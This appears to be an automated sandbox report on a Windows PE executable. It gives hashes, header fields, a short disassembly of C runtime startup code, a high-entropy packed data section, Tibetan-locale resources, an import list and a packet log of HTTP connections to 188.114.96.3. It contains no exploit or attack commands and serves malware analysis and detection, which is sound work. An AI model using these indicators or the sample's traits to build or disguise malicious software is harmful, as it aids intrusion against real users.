                                                                                    SHA1:d88585c6c9488b6d28b71dd0659edb8649e32dca
                                                                                    SHA256:2814b2a02771e2d16ce2efb1586d8623b54b50d6e1c8dfa9ab2bbf54ab8b249d
                                                                                    SHA512:e53ae73584f2de67589ab0354f4d7cf16053109e4ac458e962c17ee5dfbe65bfdcd05553574e839ebcf2925a130d75bc14994b908a2928f017776d43a7bfdd55
                                                                                    SSDEEP:3072:hlrXO4DHzvDSyUPLoigWo351k/Z2N/BbET2tOWIbq0ES4vy3DwHkEforb:/rXbT0PL1g5W2pZETbWIULvy3UHkEQ
                                                                                    TLSH:7514CF3336D0F072C96B55305834DBA57ABFB8319675899B7BA807AE5F303E06336252
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................B.s.......p.......f.................w.....a.......q.......t.....Rich............PE..L......b...................
                                                                                    Icon Hash:70d0eeeaeacae2dd
                                                                                    Entrypoint:0x40725f
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x62F4FA9D [Thu Aug 11 12:48:29 2022 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:0
                                                                                    File Version Major:5
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:87e1f4e32d01d5a52e605f27fd138118
                                                                                    Instruction
                                                                                    call 00007F1A14C0985Ch
                                                                                    jmp 00007F1A14C031CEh
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                    test ecx, 00000003h
                                                                                    je 00007F1A14C03376h
                                                                                    mov al, byte ptr [ecx]
                                                                                    add ecx, 01h
                                                                                    test al, al
                                                                                    je 00007F1A14C033A0h
                                                                                    test ecx, 00000003h
                                                                                    jne 00007F1A14C03341h
                                                                                    add eax, 00000000h
                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                    mov eax, dword ptr [ecx]
                                                                                    mov edx, 7EFEFEFFh
                                                                                    add edx, eax
                                                                                    xor eax, FFFFFFFFh
                                                                                    xor eax, edx
                                                                                    add ecx, 04h
                                                                                    test eax, 81010100h
                                                                                    je 00007F1A14C0333Ah
                                                                                    mov eax, dword ptr [ecx-04h]
                                                                                    test al, al
                                                                                    je 00007F1A14C03384h
                                                                                    test ah, ah
                                                                                    je 00007F1A14C03376h
                                                                                    test eax, 00FF0000h
                                                                                    je 00007F1A14C03365h
                                                                                    test eax, FF000000h
                                                                                    je 00007F1A14C03354h
                                                                                    jmp 00007F1A14C0331Fh
                                                                                    lea eax, dword ptr [ecx-01h]
                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                    sub eax, ecx
                                                                                    ret
                                                                                    lea eax, dword ptr [ecx-02h]
                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                    sub eax, ecx
                                                                                    ret
                                                                                    lea eax, dword ptr [ecx-03h]
                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                    sub eax, ecx
                                                                                    ret
                                                                                    lea eax, dword ptr [ecx-04h]
                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                    sub eax, ecx
                                                                                    ret
                                                                                    cmp ecx, dword ptr [0042C2B0h]
                                                                                    jne 00007F1A14C03354h
                                                                                    rep ret
                                                                                    jmp 00007F1A14C0984Ch
                                                                                    push eax
                                                                                    push dword ptr fs:[00000000h]
                                                                                    lea eax, dword ptr [esp+0Ch]
                                                                                    sub esp, dword ptr [esp+0Ch]
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    mov dword ptr [eax], ebp
                                                                                    mov ebp, eax
                                                                                    mov eax, dword ptr [0042C2B0h]
                                                                                    Programming Language:
                                                                                    • [ASM] VS2008 build 21022
                                                                                    • [ C ] VS2008 build 21022
                                                                                    • [IMP] VS2005 build 50727
                                                                                    • [C++] VS2008 build 21022
                                                                                    • [RES] VS2008 build 21022
                                                                                    • [LNK] VS2008 build 21022
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1875c0x50.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x15a0000x1ee8.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000xf08.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x12400x1c.text
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39700x40.text
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x1f4.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x1830a0x18400False0.5318943298969072COM executable for DOS6.3718422303346625IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .data0x1a0000x13f3b00x13600False0.9458291330645161data7.8477215097242885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x15a0000x1ee80x2000False0.610595703125data5.7865329961947936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x15c0000x276e0x2800False0.32138671875data3.342680269338327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanTibet
                                                                                    RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanNepal
                                                                                    RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanIndia
                                                                                    RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanTibet
                                                                                    RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanNepal
                                                                                    RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanIndia
                                                                                    RT_STRING0x15bd900x4edataTibetanTibet
                                                                                    RT_STRING0x15bd900x4edataTibetanNepal
                                                                                    RT_STRING0x15bd900x4edataTibetanIndia
                                                                                    RT_STRING0x15bde00x50dataTibetanTibet
                                                                                    RT_STRING0x15bde00x50dataTibetanNepal
                                                                                    RT_STRING0x15bde00x50dataTibetanIndia
                                                                                    RT_STRING0x15be300xb6dataTibetanTibet
                                                                                    RT_STRING0x15be300xb6dataTibetanNepal
                                                                                    RT_STRING0x15be300xb6dataTibetanIndia
                                                                                    RT_GROUP_ICON0x15bb100x22dataTibetanTibet
                                                                                    RT_GROUP_ICON0x15bb100x22dataTibetanNepal
                                                                                    RT_GROUP_ICON0x15bb100x22dataTibetanIndia
                                                                                    RT_VERSION0x15bb380x258data
                                                                                    DLLImport
                                                                                    KERNEL32.dllRequestWakeupLatency, CreateFileA, FindActCtxSectionStringA, WriteConsoleInputA, ClearCommBreak, WriteFile, FindFirstVolumeMountPointW, CreateDirectoryExA, LocalSize, WaitForMultipleObjects, ReadConsoleInputA, GetProcessId, FreeUserPhysicalPages, WriteConsoleOutputAttribute, DebugActiveProcessStop, GetLocaleInfoW, GetProcAddress, LocalAlloc, GetCommandLineW, GetBinaryTypeW, InterlockedExchange, OpenMutexW, GetConsoleTitleA, SearchPathA, FreeConsole, EndUpdateResourceA, GetLastError, GetProfileSectionA, SetConsoleCursorInfo, GetConsoleAliasW, CreateSemaphoreA, GlobalFlags, GetConsoleAliasesLengthA, FindResourceW, SetVolumeMountPointW, GetModuleHandleW, HeapAlloc, GetComputerNameA, GetCurrentProcessId, CreateNamedPipeA, EnumResourceLanguagesA, SetHandleInformation, _hwrite, CreateActCtxA, DeleteVolumeMountPointA, MoveFileWithProgressA, AddRefActCtx, WritePrivateProfileStringA, GetUserDefaultLangID, QueryMemoryResourceNotification, WaitForSingleObject, GetLongPathNameW, InterlockedDecrement, VerifyVersionInfoA, EnumCalendarInfoW, FindNextFileW, EnumTimeFormatsA, SetLastError, SetCriticalSectionSpinCount, WritePrivateProfileSectionA, LoadLibraryA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, RtlUnwind, HeapFree, DeleteFileA, GetStartupInfoW, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, InitializeCriticalSectionAndSpinCount, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle
                                                                                    USER32.dllGetComboBoxInfo
                                                                                    GDI32.dllGetTextFaceW
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    TibetanTibet
                                                                                    TibetanNepal
                                                                                    TibetanIndia
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Feb 7, 2023 19:44:46.600966930 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.619282007 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.619430065 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.619829893 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.619877100 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.638236046 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.638267040 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.768254995 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.768284082 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.768481016 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.776756048 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.776806116 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.794220924 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.794245958 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862286091 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862343073 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862392902 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862442970 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862492085 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862540007 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862567902 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.862637997 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862685919 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.862756968 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.862935066 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.862965107 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.863015890 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.863063097 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.863106012 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.863106012 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.863171101 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.906440973 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906534910 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906580925 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906630039 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906687021 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.906748056 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.906778097 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906893015 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906944036 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.906955957 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.906991959 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.907037973 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.907042027 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.907881021 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.907934904 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.907979965 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908025980 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908029079 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.908057928 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.908618927 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908668995 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908714056 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908740044 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.908760071 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.908766985 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.909514904 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.909563065 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.909589052 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.909609079 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.909656048 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.909728050 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.910384893 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.910444021 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.910479069 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.910597086 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.955492020 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955538988 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955564976 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955588102 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955683947 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.955744028 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955765963 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.955770016 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955796957 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955821037 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.955846071 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.955873966 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.956593037 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.956629992 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.956656933 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.956681013 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.956685066 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.956732035 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.957412004 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.957448006 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.957499981 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.957518101 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.957545042 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.957988977 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.958277941 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.958318949 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.958343983 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.958369017 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.958388090 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.958425045 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.959188938 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.959223032 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.959249020 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.959274054 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.959307909 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.959343910 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.960030079 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.960064888 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.960092068 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.960115910 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.960154057 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.960191965 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.960890055 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.960930109 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.960962057 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.960990906 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.960998058 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.961052895 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.961747885 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.961783886 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.961815119 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.961841106 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.961852074 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.961898088 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.962587118 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.962621927 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.962650061 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.962677002 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.962733030 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.962764025 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.963454962 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.963632107 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.963656902 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.963679075 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.963682890 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.963705063 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.963722944 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:46.964469910 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:46.964531898 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.000427008 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.000462055 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.000490904 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.000524998 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.000546932 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.000562906 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.000582933 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.000595093 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.000617981 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.001128912 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.001152992 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.001173019 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.001192093 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.001211882 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.001239061 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.001889944 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.001914024 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.001933098 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.001951933 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.001996040 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.002734900 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.002758980 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.002778053 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.002795935 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.002814054 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.002856016 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.003546953 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.003588915 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.003616095 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.003642082 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.003650904 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.003704071 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.004384995 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.004412889 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.004440069 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.004463911 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.004467010 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.004549980 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.005131960 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.005163908 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.005191088 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.005218029 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.005244017 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.005279064 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.005980015 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.006020069 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.006046057 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.006071091 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.006072044 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.006115913 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.006794930 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.006844997 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.006872892 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.006897926 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.006916046 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.007603884 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.007636070 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.007658005 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.007684946 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.007695913 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.007746935 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.007792950 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.008388996 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.008419991 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.008444071 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.008466959 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.008469105 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.008516073 CET4969780192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:44:47.009239912 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.009382010 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.009408951 CET8049697188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:44:47.009434938 CET8049697188.114.96.3192.168.2.3
